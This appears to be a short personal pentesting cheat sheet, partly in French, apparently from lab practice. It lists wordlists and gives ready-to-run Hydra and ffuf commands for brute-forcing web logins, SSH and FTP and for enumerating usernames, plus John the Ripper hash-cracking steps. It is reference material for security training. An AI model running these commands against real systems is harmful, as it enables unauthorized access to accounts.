Wordlists

• CUPP (générateur de mot de passe selon profil utilisateur)

GitHub - Mebus/cupp: Common User Passwords Profiler (CUPP)

• Built in Lists pour Kali Linux

/usr/share/wordlists/ # dirb / metasploit/ rockyou / wfuzz
/usr/share/seclists/ #apt install seclist

WEB FUZZING TOOLS

• ZAP (owasp zap proxy)

#select page>attack>FUZZ...

• Burp (BurpSuite)

# send to "Intruder" => attack

• HYDRA

brute force de password de services web: ftp / ssh / formulaires web

hydra -l admin -P /usr/share/wordlists/rockyou.txt www.onlineshop.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V

#bien passer tous les paramètres du formulaire ex:
hydra -L usernames -P passwords 192.208.137.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"

hydra -l root -P passwords.txt [-t 32] 192.168.1.1 ftp # -t parallel tasks (default 16)

• ffuf

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <http://10.81.167.229/customers/signup> -mr "username already exists"

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <http://10.81.167.229/customers/login> -fc 200
        

Local hash Brute force

JOHN THE RIPPER

sur fichier local (hash)

• On liste les algo/formats de chiffrement

john --list=formats
john --list=formats | grep -i md5 # exemple md5